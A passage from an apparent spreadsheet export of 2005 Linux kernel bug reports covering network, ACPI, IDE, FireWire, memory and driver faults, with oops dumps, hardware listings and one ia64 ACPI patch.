0000:00:09.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2500ns min, 2500ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at d800 [size=128] Region 1: Memory at da500000 (32-bit, non-prefetchable) [size=128] Expansion ROM at d8000000 [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0- ,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0a.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 08) Subsystem: IBM 10/100 EtherJet Management Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 14000ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 10 Region 0: Memory at da501000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at dc00 [size=64] Region 2: Memory at da400000 (32-bit, non-prefetchable) [size=1M] Expansion ROM at d9000000 [disabled] [size=1M] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME (D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable+ DSel=0 DScale=2 PME- 0000:00:0c.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10) Subsystem: C-Media Electronics Inc CMI8738/C3DX PCI Audio Device Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 6000ns max) Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at e000 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2- ,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0c.1 Communication controller: C-Media Electronics Inc CM8738 (rev 10) Subsystem: C-Media Electronics Inc CM8738 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 12 Region 0: I/O ports at e400 [size=64] Capabilities: [40] Power Management version 2 Flags: PMEClk+ DSI- D1- D2+ AuxCurrent=55mA PME(D0+,D1- ,D2+,D3hot+,D3cold+) Status: D3 PME-Enable+ DSel=0 DScale=0 PME- /proc/iomem: 00000000-0009ffff : System RAM 000a0000-000bffff : Video RAM area 000c0000-000c5fff : Video ROM 000f0000-000fffff : System ROM 00100000-17ffffff : System RAM 00100000-0022eebd : Kernel code 0022eebe-0029a47f : Kernel data da000000-da3fffff : 0000:00:00.0 da400000-da4fffff : 0000:00:0a.0 da400000-da4fffff : e100 da500000-da50007f : 0000:00:09.0 da501000-da501fff : 0000:00:0a.0 da501000-da501fff : e100 ffff0000-ffffffff : reserved /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 03c0-03df : vga+ 03f6-03f6 : ide0 0cf8-0cff : PCI conf1 d000-d00f : 0000:00:07.1 d000-d007 : ide0 d008-d00f : ide1 d800-d87f : 0000:00:09.0 d800-d87f : 0000:00:09.0 dc00-dc3f : 0000:00:0a.0 dc00-dc3f : e100 e000-e0ff : 0000:00:0c.0 e400-e43f : 0000:00:0c.1 Software Environment: no /proc/modules available (kernel WITHOUT loadable module support) free -m output: total used free shared buffers cached Mem: 378 337 41 0 14 253 -/+ buffers/cache: 69 308 Swap: 86 0 86 ifconfig --version: net-tools 1.60 ifconfig 1.42 (2001-04-13) /etc/network/interfaces output: auto eth0 iface eth0 inet static address 82.135.220.1 netmask 255.255.255.224 gateway 82.135.220.30 auto eth0:0 iface eth0:0 inet static address 192.168.1.9 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.84 auto sit0 iface sit0 inet6 static address 2002:5287:dc01::1 netmask 48 gateway ::192.88.99.1 Problem Description: I've set up an IPV6 over IPV4 tunneling on my machine and made a script which adds 2200+ IP ipv6 addresses to sit0 iface (required for 6tunnel program). The script looks like that: #!/bin/sh ifconfig sit0 add 2002:5287:dc01::2/48 ifconfig sit0 add 2002:5287:dc01::3/48 ifconfig sit0 add 2002:5287:dc01::4/48 ifconfig sit0 add 2002:5287:dc01::5/48 &lt;...&gt; ifconfig sit0 add 2002:5287:dc01::2284/48 ifconfig sit0 add 2002:5287:dc01::2285/48 ifconfig sit0 add 2002:5287:dc01::2286/48 then I added an alias to my eth0 card (192.168.1.9 IP) and did /etc/init.d/networking restart. After that, I had to tun the IP adder script again, but the script could add only about 1700 IPs, then it started displaying the memorry allocation error. I tried to restart networking several times, also tried several times ifdwon sit0 &amp;&amp; ifup sit0, but after that I couldn't add not a single IP, I was getting the error: # ifup sit0 SIOCSIFADDR: Cannot allocate memory Steps to reproduce: Actually I don't know-perhaps adding *much* IP addresses to sit0, then restarting the networking/interface about 15 or more times, then trying to add the IPs again and then trying to restart ifcae/networking-that should show the problem..</t>
  </si>
  <si>
    <t>kernel panic in net/ipv4/tcp_output.c:924</t>
  </si>
  <si>
    <t>2.6.9-1.6_FC2smp</t>
  </si>
  <si>
    <t>2005-01-17 15:06 UTC</t>
  </si>
  <si>
    <t>Jacques Amar</t>
  </si>
  <si>
    <t>2005-07-28 15:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core (FC2) Hardware Environment: Dell 1620 Software Environment: Web browser Problem Description: kernel panic on MULTIPLE machines - possible new exploit Steps to reproduce: Servers (20 of them) have been running for a while with no issue. 5 servers in a row have been hit with this kernel panic. One after the other. Possible DoS attack to new exploit. -------------- kernel BUG at net/ipv4/tcp_output.c:924! invalid operand: 0000 [#1] SMP Modules linked in: loop md5 ipv6 nfs lockd sunrpc tg3 e100 mii dm_mod ofci_hcd ext3 jdb aic7xxx sd_mod scsi_mod CPU: 1 EIP: 0060:[&lt;02294594&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.9-1.6_FC2smp) EIP is at tcp_retrans_try_collapse+0xbe/0x2c2 eax: 333ff140 ebx: 723843c0 ecx: 000005b4 edx: 376222f8 esi: 376220e0 edi: fffffff5 ebp: 6963cde0 esp: 023bbf5c ds: 007b es: 007b ss:0068 Process swapper (pid: 0,threadinfo=023bb000 task=04471080) Stack: 00000010 0000039c 00000218 376222f8 376220e0 723843c0 376220e0 fffffff5 376222f8 02294a4b 37622154 000005b4 376220e0 376220e0 376222f8 37622154 022968a1 376220e0 376222f8 04022760 023bbfcc 02296a42 022969c3 376220e0 Call Trace: Stack pointer is garbage, not printing trace Code: 00 8b 44 24 08 03 44 24 04 39 c8 0f 8f 16 02 00 00 8b 83 ac 00 00 00 66 83 78 0a 01 75 0d 8b 85 ac 00 00 00 66 83 78 0a 01 74 08 &lt;0f&gt; 0b 9c 03 3d 82 2f 02 8b 45 08 ff 48 08 c7 45 08 00 00 00 00 &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>VIA VT6410 PATA without RAID (found on ASUS P4P800 Deluxe) doesnt work without a patch</t>
  </si>
  <si>
    <t>2005-01-18 13:13 UTC</t>
  </si>
  <si>
    <t>glamdring-inc</t>
  </si>
  <si>
    <t>2005-12-19 04:38 UTC</t>
  </si>
  <si>
    <t>Distribution: X86* any The PATA side of the VT6410 is usable without RAID configuration, as a normal EIDE ATA133 controller. For at least a year, perhaps longer there has been an open source patch passed around in various forums among p4p800 Deluxe users who desire the use of the PATA controller. I have used and verified predictable and least-astonishing behavior from this patch described as follows: before patch: The PATA controller is not visible to the kernel for use as a drive controller after patch: The PATA controller is functional and works just like a generic PCI EIDE controller ATA-133 The 2.6.x patch is described here: http://source.robertk.com/ The patch itself is located here: http://source.robertk.com/VIA610.267.patch</t>
  </si>
  <si>
    <t>fan will start when cpu is hot but will never stop, even if cpu is cold an fan blows cold air.</t>
  </si>
  <si>
    <t>2.6.10-1.741_FC3</t>
  </si>
  <si>
    <t>2005-01-18 14:14 UTC</t>
  </si>
  <si>
    <t>Dimitris</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: IBM ThinkPad A31p Software Environment: Fedora Core 3 + kernel 2.6.10-1.741_FC3 Problem Description: fan will start when cpu is hot but will never stop, even if cpu is cold an fan blows cold air. i understand that this machine may not allow control of the fan via ACPI, though it seems weird that 'something' makes the fan start, but that unknown 'something' can't stop the fan. its interesting that Windoze has a special power management driver called "IBM PM" driver thats required to install. Maybe IBM uses some custom method to control the fan? Steps to reproduce: boot, wait for fan to start, fan never stops.</t>
  </si>
  <si>
    <t>(net skfp) Syskonnect FDDI SK-5544 not working</t>
  </si>
  <si>
    <t>2.6.10 and 2.6.5</t>
  </si>
  <si>
    <t>2005-01-19 11:04 UTC</t>
  </si>
  <si>
    <t>Albert Ortiz</t>
  </si>
  <si>
    <t>2006-01-18 11:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 with various 2.6 kernels Hardware Environment: HP Proliant DL360 G4 Software Environment: After new OS installation Problem Description: After installing Fedora Core 2 I tried to install the module for the FDDI SK-5544 card with the next results. The BIOS and the OS detected the card but I found a error message and the interface does not work. Looks like kernel problem. I tried also to compile the newest kernel 2.6.10 with same results. Also to compile as a driver (without modules) and the same. The dmesg says: Syskonnect FDDI PCI Adapter driver 2.07 skfp:Invalid PCI region size: 2048 skfddi: probe of 0000.0a.01.0 failed with error -5 (this happen at booting time or when I install the module with insmod). Steps to reproduce: "insmod skfp.ko" for example, but I have the same rebooting the machine. Any help will be appreciated. Thanks a lot in advance. Best regards, Albert Ortiz</t>
  </si>
  <si>
    <t>Random "kernel BUG at mm/page_alloc.c:318!"</t>
  </si>
  <si>
    <t>2005-01-20 08:41 UTC</t>
  </si>
  <si>
    <t>Gilberto C</t>
  </si>
  <si>
    <t>2005-01-21 03:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 2004.0 Hardware Environment: - Motherboard Asus A7V-E with CPU athlon 1200Mhz - SCSI storage controller: Adaptec AHA-2940U/UW/D / AIC-7881U (rev 01) Software Environment: Problem Description: kernel BUG at mm/page_alloc.c:318! invalid operand: 0000 [#1] Modules linked in: 8139too mii dm_mod sbp2 ohci1394 ieee1394 ohci_hcd uhci_hcd usb_storage usbhid ehci_hcd usbcore CPU: 0 EIP: 0060:[&lt;c013a159&gt;] Not tainted VLI EFLAGS: 00010002 (2.6.10-gentoo-r6) EIP is at __rmqueue+0xf9/0x110 eax: 00000001 ebx: c13d0d40 ecx: 00001000 edx: 0001e86a esi: c04834fc edi: 00000002 ebp: 00000001 esp: df363dbc ds: 007b es: 007b ss: 0068 Process splash_util.sta (pid: 7213, threadinfo=df362000 task=df9b1080) Stack: c04834a4 c13d0d40 0001d868 c13d0d00 0000000e c04834d0 0000000e 00000082 c013a1a8 c04834a4 00000000 c04834a4 00000246 c04834c0 00000000 c013a561 c04834a4 00000000 00000010 c04834d0 c04834a4 dea49cc8 00000000 00000001 Call Trace: [&lt;c013a1a8&gt;] rmqueue_bulk+0x38/0x60 [&lt;c013a561&gt;] buffered_rmqueue+0x141/0x150 [&lt;c013a8ab&gt;] __alloc_pages+0x33b/0x360 [&lt;c01442e1&gt;] do_anonymous_page+0x71/0x150 [&lt;c0144423&gt;] do_no_page+0x63/0x2b0 [&lt;c0144846&gt;] handle_mm_fault+0xd6/0x140 [&lt;c01189cc&gt;] do_page_fault+0x18c/0x599 [&lt;c0125066&gt;] update_process_times+0x46/0x60 [&lt;c0106e74&gt;] timer_interrupt+0x44/0x100 [&lt;c0135090&gt;] handle_IRQ_event+0x30/0x70 [&lt;c012153d&gt;] __do_softirq+0x7d/0x90 [&lt;c0118840&gt;] do_page_fault+0x0/0x599 [&lt;c01031c7&gt;] error_code+0x2b/0x30 Code: 8d 4d 01 89 42 04 89 53 18 89 70 04 89 06 8b 46 08 8b 54 24 08 01 fa d3 ea 0f bb 10 3b 6c 24 28 7f b4 8b 44 24 0c e9 37 ff ff ff &lt;0f&gt; 0b 3e 01 57 52 42 c0 eb c6 8d b6 00 00 00 00 8d bc 27 00 00 Steps to reproduce: Just booting Obs: The same error doesn't occur when booting kernel version 2.6.7</t>
  </si>
  <si>
    <t>Bug report : drivers/net/hamradio/Kconfig</t>
  </si>
  <si>
    <t>2005-01-21 07:05 UTC</t>
  </si>
  <si>
    <t>Simon DEPIETS</t>
  </si>
  <si>
    <t>2007-02-20 06:47 UTC</t>
  </si>
  <si>
    <t>Hello, i'm translating some Kconfig files to french for the kernelFR project (http://kernelfr.traduc.org), and while i was reading drivers/net/hamradio/Kconfig The kernel is 2.6.10 In section : "Baycom ser12 halfduplex driver for AX.25" 9th section, in the 3rdline, there is : "The driver supports the ser12 design in full-duplex mode." instead of "half-duplex mode."</t>
  </si>
  <si>
    <t>sys_poll() sanity check</t>
  </si>
  <si>
    <t>2.6.10 and older</t>
  </si>
  <si>
    <t>2005-01-23 06:18 UTC</t>
  </si>
  <si>
    <t>Antonio Batovanja</t>
  </si>
  <si>
    <t>2008-03-05 15:38 UTC</t>
  </si>
  <si>
    <t>Distribution: all Hardware Environment: all Software Environment: poll() on more then OPEN_MAX file descriptors Problem Description: sys_poll() returns -EINVAL when polling on more then OPEN_MAX fd-s when some of the fd-s are &lt;0 I was trying to call poll() using an array of 4000 fd-s(sockets) which are all initially set to -1 (not connected). sys_poll() has the following check: /* Do a sanity check on nfds ... */ if (nfds &gt; current-&gt;files-&gt;max_fdset &amp;&amp; nfds &gt; OPEN_MAX) return -EINVAL; In my opiniton, that check is invalid since: Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI does not work anymore (AE_AML_NO_OPERAND)</t>
  </si>
  <si>
    <t>2.6.11-rc2-mm1</t>
  </si>
  <si>
    <t>2005-01-24 18:10 UTC</t>
  </si>
  <si>
    <t>Brice Goglin</t>
  </si>
  <si>
    <t>2006-09-28 13:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Compaq Evo N600c Problem Description: Following Len Brown's answer to my initial email http://lkml.org/lkml/2005/1/24/334 There's no more ACPI working on 2.6.11-rc2-mm1. Reverting the bk-acpi.patch makes it work.</t>
  </si>
  <si>
    <t>Permission denied on client when attempting to mount XFS via NFS</t>
  </si>
  <si>
    <t>2.6.11-rc1-mm*, 2.6.11-rc2-mm1 (but 2.6.10-mm3 is OK)</t>
  </si>
  <si>
    <t>2005-01-24 20:45 UTC</t>
  </si>
  <si>
    <t>2005-02-05 18:57 UTC</t>
  </si>
  <si>
    <t>Christoph Hellwig</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: 800MHz Athlon, 4 IDE hard drives of varying capacities (40, 60, 120, and 160GB) and filesystems (reiser3, ext3, reiser4, XFS) Software Environment: Tons of stuff, but relevant to this bug is that all 4 disks are being served out via NFS (v3). Problem Description: Attempting to mount an XFS filesystem over NFS will result in a "Permission denied" error on the client. (In my case the clients I have tried so far are 2.4.21-20.EL from Tao Linux and 2.6.10-ac10-bkn2; the latter is my own private kernel but for the purposes of this bug it should be the same as 2.6.10-ac10.) On the server side, I get this kind of thing in the logs each time a mount is attempted (in this case, main.numbex is the client and /nfs/d3 is where the XFS filesystem is mounted): Jan 24 20:21:56 nserv rpc.mountd: authenticated mount request from main.numbex:9 90 for /nfs/d3 (/nfs/d3) Jan 24 20:21:56 nserv rpc.mountd: getfh failed: Operation not permitted Steps to reproduce: NOTE: The constraints in parentheses for steps 1 and 2 may not be necessary, but if you follow them, you will have a setup closer to mine. 1. Set up NFS server with an XFS filesystem (although the XFS filesystem being shared should not be the system's / filesystem). 2. Share this filesystem (at its root) to clients. 3. (Try to) mount this filesystem from a client computer. I will now try to reproduce this with another computer acting as the server, and/or I will try to figure out what patch is causing this bug.</t>
  </si>
  <si>
    <t>sbp2/scsi emulation broken</t>
  </si>
  <si>
    <t>2005-01-25 00:02 UTC</t>
  </si>
  <si>
    <t>Stefan Katletz</t>
  </si>
  <si>
    <t>2005-07-06 09:40 UTC</t>
  </si>
  <si>
    <t>Distribution: debian sarge / ubuntu 4.10 / Mandrake 10.1 Hardware Environment: Asus laptop L3 (P4M) &amp; FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller &amp; external USB/firewire harddisk (ICY box) Software Environment: kernel 2.6.8 Problem Description: the scsi emulation for the external hard disk connected via firewire doesn't work (USB works). With 2.4.18 kernel there was no problem. Steps to reproduce: Autoloading produces in dmesg: ieee1394: Error parsing configrom for node 0-00:1023 ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: Node added: ID:BUS[0-00:1023] GUID[0050770e00071002] ieee1394: unsolicited response packet received - no tlabel match scsi0 : SCSI emulation for IEEE-1394 SBP-2 Devices ieee1394: sbp2: Error logging into SBP-2 device - login timed-out sbp2: probe of 0050770e00071002-0 failed with error -16 scsi1 : SCSI emulation for IEEE-1394 SBP-2 Devices ieee1394: sbp2: Error logging into SBP-2 device - login timed-out sbp2: probe of 0050770e00071002-0 failed with error -16 with manual insertion I can see the disc in /proc/scsi/scsi but it doesn't work: modprobe iee1394 modprobe ohci1394 modprobe sbp2 cat /proc/scsi/scsi Attached devices: Host: scsi4 Channel: 00 Id: 00 Lun: 00 Vendor: HDS72252 Model: 5VLAT80 Rev: Type: Direct-Access ANSI SCSI revision: 06 dmesg: ieee1394: Node added: ID:BUS[0-00:1023] GUID[0050770e00071002] ieee1394: Host added: ID:BUS[0-01:1023] GUID[00e018000303eed7] ieee1394: unsolicited response packet received - no tlabel match sbp2: $Rev: 1219 $ Ben Collins &lt;bcollins@debian.org&gt; scsi2 : SCSI emulation for IEEE-1394 SBP-2 Devices ieee1394: sbp2: Logged into SBP-2 device ieee1394: Node 0-00:1023: Max speed [S400] - Max payload [2048] Vendor: HDS72252 Model: 5VLAT80 Rev: Type: Direct-Access ANSI SCSI revision: 06 SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) sda: asking for cache data failed sda: assuming drive cache: write through /dev/scsi/host2/bus0/target0/lun0:&lt;3&gt;ieee1394: sbp2: aborting sbp2 command Read (10) 00 00 00 00 00 00 00 08 00 ieee1394: sbp2: aborting sbp2 command Test Unit Ready 00 00 00 00 00 ieee1394: sbp2: reset requested ieee1394: sbp2: Generating sbp2 fetch agent reset ieee1394: sbp2: aborting sbp2 command Test Unit Ready 00 00 00 00 00 ieee1394: sbp2: reset requested ieee1394: sbp2: Generating sbp2 fetch agent reset ieee1394: sbp2: aborting sbp2 command Test Unit Ready 00 00 00 00 00 ieee1394: sbp2: reset requested ieee1394: sbp2: Generating sbp2 fetch agent reset ieee1394: sbp2: aborting sbp2 command Test Unit Ready 00 00 00 00 00 scsi: Device offlined - not ready after error recovery: host 2 channel 0 id 0 lun 0 SCSI error : &lt;2 0 0 0&gt; return code = 0x50000 end_request: I/O error, dev sda, sector 0 Buffer I/O error on device sda, logical block 0 scsi2 (0:0): rejecting I/O to offline device Buffer I/O error on device sda, logical block 0 unable to read partition table Attached scsi disk sda at scsi2, channel 0, id 0, lun 0</t>
  </si>
  <si>
    <t>Errors in hash_dst() and hashlimit_match functions (ipt_hashlimit.c)</t>
  </si>
  <si>
    <t>&lt;= 2.6.11rc2</t>
  </si>
  <si>
    <t>2005-01-26 06:42 UTC</t>
  </si>
  <si>
    <t>2005-02-02 10:32 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel source Hardware Environment: All Software Environment: All Problem Description: Incorrect hashing Steps to reproduce:</t>
  </si>
  <si>
    <t>i82635_init hangs if first call to pcmcia_register_socket fails</t>
  </si>
  <si>
    <t>2005-01-27 13:45 UTC</t>
  </si>
  <si>
    <t>2005-02-27 03:46 UTC</t>
  </si>
  <si>
    <t>Distribution: NA Hardware Environment: Diamond Systems Hercules CPU board (Via Eden) Software Environment: 2.6.7 kernel, i82635.c driver Problem Description: in the function i82635.c::i82635_init, there is a loop that registers all the PCMCIA sockets with the cs core. The loop has a condition where if a call to pcmcia_register_socket fails, it tries to deregister all the sockets that were already registered, and then exits the loop. However, because of the way the loop and fail conditions are coded, if the FIRST call to pcmcia_register_socket fails, then the loop will never terminate. This is because the first iteration has a socket index 'i' equal to 0. static int __init init_i82365(void) { int i, ret; ...other stuff /* register sockets with the pcmcia core */ for (i = 0; i &lt; sockets; i++) { socket[i].socket.dev.dev = &amp;i82365_device.dev; socket[i].socket.ops = &amp;pcic_operations; socket[i].socket.owner = THIS_MODULE; socket[i].number = i; ret = pcmcia_register_socket(&amp;socket[i].socket); ========&gt; if (ret &amp;&amp; i--) { ========&gt; this condition fails if 'i' == 0 !!! for (; i&gt;= 0; i--) pcmcia_unregister_socket(&amp;socket[i].socket); break; } #if 0 /* driver model ordering issue */ class_device_create_file(&amp;socket[i].socket.dev, &amp;class_device_attr_info); class_device_create_file(&amp;socket[i].socket.dev, &amp;class_device_attr_exca); #endif } ...other stuff return 0; } /* init_i82365 */ ANALYSIS: if (ret &amp;&amp; i--) { the problem is that when ret != 0 (register_socket failed) AND i == 0 (first socket), the 'if' condition is false because i == 0, and so it doesn't go to the deregister and break. however the postdecrement of 'i' still happens, so that i is set to -1. This screws up the loop counter so that it repeats again with i == 0, and it continues forevever. Steps to reproduce: build with pcmcia support, and the i82635 module. set up some pcmcia hardware, modify pcmcia_register_socket to always return nonzero (indicating it failed) and do "insmod i82635.ko". it will hang. put some printk's in the loop and it will show that it is repeating. FIX : restructure that loop and avoid the side effect on 'i'.</t>
  </si>
  <si>
    <t>CPEI override flag for CPU hotplug</t>
  </si>
  <si>
    <t>2.6.11-rc1 and below</t>
  </si>
  <si>
    <t>2005-01-28 15:50 UTC</t>
  </si>
  <si>
    <t>2005-07-27 18:58 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.6.11-rc1 and below Hardware Environment: Software Environment: Problem Description: This patch adds support to evaluate cpei override flag in the platform interrupt source structure. Also records the cpu that was provided as hint from ACPI. This patch is required to efffectively offline the CPEI targetted CPU. Steps to reproduce: ---patch --- --- Signed-off-by: Ashok Raj &lt;ashok.raj@intel.com&gt; This patch adds support to evaluate cpei override flag in the platform interrupt source structure. Also records the cpu that was provided as hint from ACPI. --- linux-ia64-release-2.6.11-araj/arch/ia64/kernel/acpi.c | 26 +++++++++++++ linux-ia64-release-2.6.11-araj/arch/ia64/kernel/topology.c | 8 ++++ linux-ia64-release-2.6.11-araj/include/asm-ia64/acpi.h | 7 +++ linux-ia64-release-2.6.11-araj/include/linux/acpi.h | 5 ++ 4 files changed, 45 insertions(+), 1 deletion(-) diff -puN include/asm-ia64/acpi.h~cpei_override include/asm-ia64/acpi.h --- linux-ia64-release-2.6.11/include/asm-ia64/acpi.h~cpei_override 2005- 01-28 14:15:02.359592959 -0800 +++ linux-ia64-release-2.6.11-araj/include/asm-ia64/acpi.h 2005-01-28 14:15:02.380100771 -0800 @@ -98,6 +98,13 @@ const char *acpi_get_sysname (void); int acpi_request_vector (u32 int_type); int acpi_gsi_to_irq (u32 gsi, unsigned int *irq); +/* + * Record the cpei override flag and current logical cpu. This is + * useful for CPU removal. + */ +extern unsigned int can_cpei_retarget(void); +extern unsigned int is_cpu_cpei_target(unsigned int cpu); + #ifdef CONFIG_ACPI_NUMA /* Proximity bitmap length; _PXM is at most 255 (8 bit)*/ #define MAX_PXM_DOMAINS (256) diff -puN arch/ia64/kernel/acpi.c~cpei_override arch/ia64/kernel/acpi.c --- linux-ia64-release-2.6.11/arch/ia64/kernel/acpi.c~cpei_override 2005- 01-28 14:15:02.364475771 -0800 +++ linux-ia64-release-2.6.11-araj/arch/ia64/kernel/acpi.c 2005-01-28 14:15:02.382053896 -0800 @@ -11,6 +11,7 @@ * Copyright (C) 2001 Jenna Hall &lt;jenna.s.hall@intel.com&gt; * Copyright (C) 2001 Takayoshi Kochi &lt;t-kochi@bq.jp.nec.com&gt; * Copyright (C) 2002 Erich Focht &lt;efocht@ess.nec.de&gt; + * Copyright (C) 2004 Ashok Raj &lt;ashok.raj@intel.com&gt; * * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * @@ -67,6 +68,11 @@ EXPORT_SYMBOL(pm_power_off); unsigned char acpi_kbd_controller_present = 1; unsigned char acpi_legacy_devices; +static unsigned int __initdata acpi_madt_rev; + +unsigned int acpi_cpei_override; +unsigned int acpi_cpei_logical_cpu; + #define MAX_SAPICS 256 u16 ia64_acpiid_to_sapicid[MAX_SAPICS] = { [0 ... MAX_SAPICS - 1] = -1 }; @@ -267,10 +273,28 @@ acpi_parse_plat_int_src ( (plintsrc-&gt;flags.trigger == 1) ? IOSAPIC_EDGE : IOSAPIC_LEVEL); platform_intr_list[plintsrc-&gt;type] = vector; + if (acpi_madt_rev &gt; 1) { + acpi_cpei_override = plintsrc-&gt;plint_flags.cpei_override_flag; + } + acpi_cpei_logical_cpu = cpu_logical_id(( + (plintsrc-&gt;id &lt;&lt; 8) | (plintsrc-&gt;eid)) &amp; 0xffff); return 0; } +unsigned int can_cpei_retarget(void) +{ + return acpi_cpei_override; +} + +unsigned int is_cpu_cpei_target(unsigned int cpu) +{ + if (acpi_cpei_logical_cpu == cpu) + return 1; + else + return 0; +} + static int __init acpi_parse_int_src_ovr ( acpi_table_entry_header *header, const unsigned long end) @@ -328,6 +352,8 @@ acpi_parse_madt (unsigned long phys_addr acpi_madt = (struct acpi_table_madt *) __va(phys_addr); + acpi_madt_rev = acpi_madt-&gt;header.revision; + /* remember the value for reference after free_initmem() */ #ifdef CONFIG_ITANIUM has_8259 = 1; /* Firmware on old Itanium systems is broken */ diff -puN include/linux/acpi.h~cpei_override include/linux/acpi.h --- linux-ia64-release-2.6.11/include/linux/acpi.h~cpei_override 2005- 01-28 14:15:02.368382021 -0800 +++ linux-ia64-release-2.6.11-araj/include/linux/acpi.h 2005-01-28 14:15:02.383030458 -0800 @@ -202,7 +202,10 @@ struct acpi_table_plat_int_src { u8 eid; u8 iosapic_vector; u32 global_irq; - u32 reserved; + struct { + u32 cpei_override_flag:1; + u32 reserved:31; + } plint_flags; } __attribute__ ((packed)); enum acpi_interrupt_id { diff -puN arch/ia64/kernel/topology.c~cpei_override arch/ia64/kernel/topology.c --- linux-ia64-release-2.6.11/arch/ia64/kernel/topology.c~cpei_override 2005- 01-28 14:15:02.373264834 -0800 +++ linux-ia64-release-2.6.11-araj/arch/ia64/kernel/topology.c 2005-01-28 14:15:50.810764240 -0800 @@ -18,6 +18,7 @@ #include &lt;linux/node.h&gt; #include &lt;linux/init.h&gt; #include &lt;linux/bootmem.h&gt; +#include &lt;linux/acpi.h&gt; #include &lt;linux/nodemask.h&gt; #include &lt;asm/mmzone.h&gt; #include &lt;asm/numa.h&gt; @@ -36,6 +37,13 @@ int arch_register_cpu(int num) parent = &amp;sysfs_nodes[cpu_to_node(num)]; #endif /* CONFIG_NUMA */ + /* + * If CPEI cannot be re-targetted, and this is + * CPEI target, then dont create the control file + */ + if (!can_cpei_retarget() &amp;&amp; is_cpu_cpei_target(num)) + sysfs_cpus[num].cpu.no_control = 1; + return register_cpu(&amp;sysfs_cpus[num].cpu, num, parent); } _</t>
  </si>
  <si>
    <t>Bernhard Schmidt</t>
  </si>
  <si>
    <t>Reiser4</t>
  </si>
  <si>
    <t>nls_cp936.c is not synchronized with M$'s translation table</t>
  </si>
  <si>
    <t>2005-01-30 21:23 UTC</t>
  </si>
  <si>
    <t>Gang Chen</t>
  </si>
  <si>
    <t>2005-01-31 08:16 UTC</t>
  </si>
  <si>
    <t>Distribution: source Hardware Environment: All Software Environment: All Problem Description: The nls_cp936.c is not synchronized with MS's translation table, there are some characters have different code from the code in updated table of MS. For example, the unicode for character 0xB8A3 (GBK) should be U+798F, but the code is U+FA1B in nls_cp936.c. I think MS had changed the translation table, but the nls_cp936.c is not synchronized with the updated table. Please refer to http://www.microsoft.com/globaldev/reference/dbcs/936.htm for more informaiton. I'm not sure that if other nls_cp*** are also been updated with latest translation table from MS, it may be a common problem. Steps to reproduce:N/A</t>
  </si>
  <si>
    <t>ide_optical type is shown as UNKNOWN in /proc/ide/*/media</t>
  </si>
  <si>
    <t>2005-02-01 08:25 UTC</t>
  </si>
  <si>
    <t>2006-09-08 16:15 UTC</t>
  </si>
  <si>
